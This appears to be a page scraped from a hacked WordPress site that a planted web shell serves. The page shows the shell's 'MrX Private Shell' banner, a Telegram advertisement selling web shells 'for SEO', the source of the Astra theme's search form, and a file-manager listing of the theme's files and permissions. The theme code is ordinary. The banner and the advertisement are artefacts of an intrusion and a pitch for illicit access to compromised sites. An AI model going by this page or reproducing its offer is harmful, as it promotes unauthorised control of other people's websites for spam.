__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Search Form for Astra theme.
*
* @package Astra
* @link https://www.brainstormforce.com
* @since Astra 3.3.0
*/
/**
* Adding argument checks to avoid rendering search-form markup from other places & to easily use get_search_form() function.
*
* @see https://themes.trac.wordpress.org/ticket/101061
* @since 3.6.1
*/
$astra_search_input_placeholder = isset( $args['input_placeholder'] ) ? $args['input_placeholder'] : astra_default_strings( 'string-search-input-placeholder', false );
$astra_search_show_input_submit = isset( $args['show_input_submit'] ) ? $args['show_input_submit'] : true;
$astra_search_data_attrs = isset( $args['data_attributes'] ) ? $args['data_attributes'] : '';
$astra_search_input_value = isset( $args['input_value'] ) ? $args['input_value'] : '';
// Check if live search is enabled & accordingly disabling browser search suggestion.
$live_search = astra_get_option( 'live-search' );
$autocomplete_attr = $live_search ? 'autocomplete="off"' : '';
?>
<form role="search" method="get" class="search-form" action="<?php echo esc_url( home_url( '/' ) ); ?>">
<label for="search-field">
<span class="screen-reader-text"><?php echo esc_html__( 'Search for:', 'astra' ); ?></span>
<input type="search" id="search-field" class="search-field" <?php echo esc_attr( $autocomplete_attr ); ?> <?php echo esc_attr( $astra_search_data_attrs ); ?> placeholder="<?php echo esc_attr( $astra_search_input_placeholder ); ?>" value="<?php echo esc_attr( $astra_search_input_value ); ?>" name="s" tabindex="-1">
<?php if ( class_exists( 'Astra_Icons' ) && Astra_Icons::is_svg_icons() ) { ?>
<button class="search-submit ast-search-submit" aria-label="<?php echo esc_attr__( 'Search Submit', 'astra' ); ?>">
<span hidden><?php echo esc_html__( 'Search', 'astra' ); ?></span>
<i><?php Astra_Icons::get_icons( 'search', true ); ?></i>
</button>
<?php } ?>
</label>
<?php if ( $astra_search_show_input_submit ) { ?>
<input type="submit" class="search-submit" value="<?php echo esc_attr__( 'Search', 'astra' ); ?>">
<?php } ?>
</form>
<?php
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| admin | Folder | 0750 |
|
|
| assets | Folder | 0750 |
|
|
| inc | Folder | 0750 |
|
|
| languages | Folder | 0750 |
|
|
| template-parts | Folder | 0750 |
|
|
| 404.php | File | 687 B | 0640 |
|
| SECURITY.md | File | 427 B | 0640 |
|
| archive.php | File | 729 B | 0640 |
|
| changelog.txt | File | 156.75 KB | 0640 |
|
| comments.php | File | 4.5 KB | 0640 |
|
| footer.php | File | 605 B | 0640 |
|
| functions.php | File | 8.68 KB | 0640 |
|
| header.php | File | 1.46 KB | 0640 |
|
| index.php | File | 906 B | 0640 |
|
| page.php | File | 868 B | 0640 |
|
| readme.txt | File | 7.87 KB | 0640 |
|
| screenshot.jpg | File | 357.85 KB | 0640 |
|
| search.php | File | 771 B | 0640 |
|
| searchform.php | File | 2.08 KB | 0640 |
|
| sidebar.php | File | 1000 B | 0640 |
|
| single.php | File | 695 B | 0640 |
|
| style.css | File | 4.46 KB | 0640 |
|
| theme.json | File | 2.35 KB | 0640 |
|
| toolset-config.json | File | 7.46 KB | 0640 |
|
| wpml-config.xml | File | 5.11 KB | 0640 |
|